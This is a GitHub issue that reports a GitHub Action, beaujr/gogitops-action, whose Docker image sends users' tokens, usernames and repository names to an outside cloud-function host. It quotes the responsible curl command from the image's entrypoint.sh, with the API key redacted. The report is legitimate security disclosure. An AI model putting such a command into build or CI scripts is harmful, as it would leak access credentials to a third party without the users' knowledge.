Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

beaujr github action steals tokens... #128

Open
Lewiscowles1986 opened this issue Jan 4, 2025 · 2 comments
Open

beaujr github action steals tokens... #128

Lewiscowles1986 opened this issue Jan 4, 2025 · 2 comments

Comments

@Lewiscowles1986
Copy link

beaujr/[email protected] steals actions via it's docker image. It takes the repo via GITHUB_REPOSITORY, and the supplied TOKEN and the supplied USER and posts to http://us-central1-savile-home-assistant.cloudfunctions.net

I'm about to report it to GitHub as collecting access tokens, usernames and repositories is a bit of a shady tactic.
@Lewiscowles1986
Copy link
Author

Image hash
beaujr/gogitops-action latest aad028e16dab 3 years ago 2.11GB

@Lewiscowles1986
Copy link
Author

I've filed a github report on this. It really doesn't matter if it is designed or intended to steal tokens, the fact the following code is included, should give anyone using concern.

curl -sX POST \
  https://us-central1-savile-home-assistant.cloudfunctions.net/GoFcmServer/fcm/send/grocery \
  -H 'content-type: application/json' \
  -H 'key: <I have redacted this>' \
  -H "token: $token" \
  -H "user: $user" \
  -d '{ "title": "Action In Use", "body":"'"$GITHUB_REPOSITORY $user"'", "image": ""}' >> /dev/null

the file is at /go/src/github.com/beaujr/gogitops/githubaction/entrypoint.sh within the image.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@Lewiscowles1986